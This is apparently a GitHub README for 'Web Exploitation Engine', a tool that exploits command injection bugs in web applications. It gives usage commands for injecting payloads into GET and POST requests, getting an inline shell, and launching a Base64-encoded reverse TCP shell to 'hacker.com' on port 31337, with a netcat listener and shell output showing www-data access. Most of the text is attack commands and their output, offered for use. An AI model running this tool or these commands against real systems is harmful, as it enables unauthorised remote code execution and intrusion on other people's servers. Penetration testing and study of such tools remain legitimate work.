-
Notifications
You must be signed in to change notification settings - Fork 17
/
Copy pathREADME
71 lines (52 loc) · 2.58 KB
/
README
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
Web Exploitation Engine - Generic Command Injection Exploitation Utility.
This is a simple enough utility written to exploit command injection bugs
in web applications.
I had abandoned this project a while ago, then saw the brilliant "rce.py"
tool written by @LaNMaSteR53, and saw his elegant solution to the "how to
denote where to put the payload" problem, so I shamelessly ripped his code
to write this.
This tool can either give an inline shell like the original rce.py (it uses
the same functions, just rewritten to suit), or a reverse shell.
Currently it only supports a Base64 encoded Reverse TCP shell payload,
however the magic of the "payloads" module is that you can actually expand it.
You just have to do a little work to add more payloads.
So, how do I use this.
The only mandatory argument is --url='URL HERE'.
In the url, using the <rce> tag, you specify where to inject code in the request.
For example:
h4x# ./we.py --url='http://localhost/test/cmd.php?=<rce>'
shell> id
[*] Executed: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell>
By default, it assumes a GET request and uses the inline shell mode.
To specify a POST request, you pass the params and values just like a GET,
except you specify --method=post to tell the parser it is a POST injection.
For example:
h4x# ./we.py --url='http://localhost/test/cmd-post.php?cmd=<rce>' --method=post
shell> id
[*] Executed: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell>
The --shell arguement tells it if you want an inline, or reverse shell. Default
operation is the "inline shell" like the original rce.py script.
To do a reverse shell, --shell=reverse is needed. You also must specify the
host and port to connect to.
--lhost and --lport arguments are, by default, 127.0.0.1 and 4444 respectively.
So, to get a reverse shell sent to port 31337 on "hacker.com", using the above
GET request exploit, we can do the following.
h4x# ./we.py --url='http://localhost/test/cmd.php?cmd=<rce>' --shell=reverse --lhost=hacker.com --lport=31337
[+] Doing a reverse shell!
[*] LHOST: hacker.com
[*] LPORT: 31337
[!] Hope your listener is listening
And over at "hacker.com" (localhost on my box for this demo), we get the following:
# nc -lvp 31337
listening on [any] 31337 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 58794
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
Reverse shell access works rather flawlessly. For now, just the python-reverse payload, however
I hope to add a python bindshell soon, along with, perhaps, some Perl payloads for extra fun.